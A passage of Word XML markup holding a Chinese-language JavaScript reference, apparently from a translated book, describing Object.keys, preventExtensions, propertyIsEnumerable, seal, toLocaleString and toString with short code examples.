      </w:pPr>
      <w:r>
        <w:t>Object.keys()</w:t>
      </w:r>
      <w:r>
        <w:t>返回指定对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性名组成的数组。这个数组只包含那些可枚举并且直接定义在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>上的属性的名字，不包含继承的属性。（关于取得不可枚举的属性名的方法可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyNames()</w:t>
      </w:r>
      <w:r>
        <w:t>。）返回数组中的属性名的顺序即它们通过</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环枚举时的顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注意这不是在一个对象上调用的方法，它是一个全局函数，必须传入一个对象。</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Object.keys({x:1,y:2})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["x","y"]</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Object.getOwnPropertyNames()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.4</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="735" w:name="Object_preventExtensions__"/>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="735"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>禁止在一个对象上添加新的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.preventExtensions(o)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待设置可扩展性的对象。</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传入的参数对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</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Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的可扩展性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，之后将不能向它添加新的属性。这是一个永久性的改变：一旦</w:t>
      </w:r>
      <w:r>
        <w:t>一个对象设置为不可扩展的，它就再也不能改为可扩展的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>不会影响原型链，不可扩展的对象仍然可以获得新的继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这不是在一个对象上调用的方法，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isExtensible()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="736" w:name="Object_propertyIsEnumerable__"/>
      <w:r>
        <w:t>Object.propertyIsEnumerable()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="736"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检测某个属性是否在</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object.propertyIsEnumerable(propname)</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propname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含对象的指定属性名的一个字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果对象有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>propname</w:t>
      </w:r>
      <w:r>
        <w:t>的非继承属性，并且该属性可枚举，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，这意味着这个属性可以通过该对象的</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环枚举。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>语句遍历给定对象的可枚举属性。对象的属性不全是可枚举的：那些由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码添加到对象中的属性是可枚举的，但那些内置对象的预定义的属性（如方法）通常不可枚举。</w:t>
      </w:r>
      <w:r>
        <w:t>propertyIsEnumerable()</w:t>
      </w:r>
      <w:r>
        <w:t>方法提供了一个区分可枚举与不可枚举属性的方法。不过需要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准规定</w:t>
      </w:r>
      <w:r>
        <w:t>propertyIsEnumerable()</w:t>
      </w:r>
      <w:r>
        <w:t>不检查原型链，也就是说，这个方法只适用于对象的本地属性，除此之外，没有可用于测试继承属性的可枚举性的方法。</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lastRenderedPageBreak/>
        <w:t>var o=new Object();/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x=3.14;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.propertyIsEnumerable("x");//true:</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是本地属性并且可枚举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.propertyIsEnumerable("y");//false:o</w:t>
      </w:r>
      <w:r>
        <w:t>没有属性</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.propertyIsEnumerable("toString");//false:toString</w:t>
      </w:r>
      <w:r>
        <w:t>属性是承继来的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.propertyIsEnumerable("toString");//false:</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举</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Function.pro</w:t>
      </w:r>
      <w:r>
        <w:t>totype</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.hasOwnProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="737" w:name="Object_seal__"/>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="737"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>阻止添加或删除对象的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.seal(o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待封闭的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现在处于封闭状态的参数对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>。</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Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>设置为不可扩展（参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>），同时将它的所有自有属性设置为不可配置的。它的效果为阻止添加新的属性以及阻止删除现有属性。封闭一个对象是永久性的：对象一旦封闭，就不再能解封。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>不仅将属性设置为只读的，这是</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>的功能。还要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>不会影响继承属性。如果一个封闭对象的原型链中有一个非封闭对象，那么还可以添加或删除对应的继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这不是在一个对象上调用的方法，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="738" w:name="Object_toLocaleString__"/>
      <w:r>
        <w:t>Object.t</w:t>
      </w:r>
      <w:r>
        <w:t>oLocaleString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回对象的本地化的字符串表示</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object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个表示该对象的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法用于返回一个表示当前对象的字符串，使用合适的本地化格式。</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>类提供的默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是简单地调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，并返回后者返回的非本地化的字符串。不过要注意，其他类（包括</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>）都各自定义自己的这个方法的版本，用于执行本地化字符串转换。定义自己的类时，可能也需要覆盖这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>rray.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="739" w:name="Object_toString__"/>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="739"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义一个对象的字符串表示形式</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object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个表示该对象的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中一般不会经常显式地调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。一般情况下，在对象中定义这个方法，系统会在需要时自动调用它以便将该对象转为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当对象在一个字符串上下文中使用时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>系统会调用相应的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将该对象转为字符串。例如，把一个对象传入期望参数为字符串的函数时，这个对象会转为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(my_object);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似地，当使用</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符将对象与字符串连接时，对象也会转化为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg='My object is:'+my_object;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时没有参数，返回值应该是一个字符串。为了便于使用，返回的字符串应当以某种形式与调用这个方法的对象的值相关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中定义自定义类时，为这个类定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是一个不错的实践。如果没有定义这个方法，则对象会从</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>类继承默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。默认方法返回的字符串格式形如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[objectclass]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>是该对象的类：值为</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"String"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Number"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Function"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Window"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Document"</w:t>
      </w:r>
      <w:r>
        <w:t>等。有时候可以用默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的这个行为来判断未知对象的类型或类。不过，由于大多数对象都有自定义版本的</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>，因此一般需要在对象上显式地调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，类似这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.toString.apply(o);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
